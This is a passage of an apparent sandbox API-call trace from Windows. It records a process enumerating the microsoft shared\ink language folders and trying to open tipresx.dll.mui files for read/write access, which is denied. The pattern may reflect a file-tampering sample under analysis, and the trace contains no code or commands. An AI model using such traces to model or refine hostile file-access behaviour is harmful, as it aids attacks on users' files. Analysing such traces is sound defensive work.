cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 57 [0082.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.894] GetLastError () returned 0x5 [0082.894] GetLastError () returned 0x5 [0082.894] SetLastError (dwErrCode=0x5) [0082.894] GetLastError () returned 0x5 [0082.894] SetLastError (dwErrCode=0x5) [0082.894] GetLastError () returned 0x5 [0082.894] SetLastError (dwErrCode=0x5) [0082.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.895] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.895] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78490 [0082.895] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.895] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2a46df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2a46df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2a46df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.896] AreFileApisANSI () returned 1 [0082.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.897] AreFileApisANSI () returned 1 [0082.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0082.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 73 [0082.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0082.897] GetFileType (hFile=0x42c) returned 0x1 [0082.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0082.897] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.897] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.897] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.898] CloseHandle (hObject=0x42c) returned 1 [0082.898] AreFileApisANSI () returned 1 [0082.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0082.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 73 [0082.898] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.898] GetLastError () returned 0x5 [0082.898] GetLastError () returned 0x5 [0082.898] SetLastError (dwErrCode=0x5) [0082.898] GetLastError () returned 0x5 [0082.898] SetLastError (dwErrCode=0x5) [0082.898] GetLastError () returned 0x5 [0082.898] SetLastError (dwErrCode=0x5) [0082.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.899] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.899] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0082.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0082.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0082.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.900] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.900] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0082.900] AreFileApisANSI () returned 1 [0082.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE", lpUsedDefaultChar=0x0) returned 57 [0082.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.900] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.900] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.900] AreFileApisANSI () returned 1 [0082.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0082.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 57 [0082.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.900] GetLastError () returned 0x5 [0082.900] GetLastError () returned 0x5 [0082.900] SetLastError (dwErrCode=0x5) [0082.900] GetLastError () returned 0x5 [0082.900] SetLastError (dwErrCode=0x5) [0082.900] GetLastError () returned 0x5 [0082.900] SetLastError (dwErrCode=0x5) [0082.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0082.901] AreFileApisANSI () returned 1 [0082.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0082.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 57 [0082.901] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.901] GetLastError () returned 0x5 [0082.901] GetLastError () returned 0x5 [0082.901] SetLastError (dwErrCode=0x5) [0082.901] GetLastError () returned 0x5 [0082.901] SetLastError (dwErrCode=0x5) [0082.901] GetLastError () returned 0x5 [0082.901] SetLastError (dwErrCode=0x5) [0082.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0082.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.901] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.901] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78550 [0082.902] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.902] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 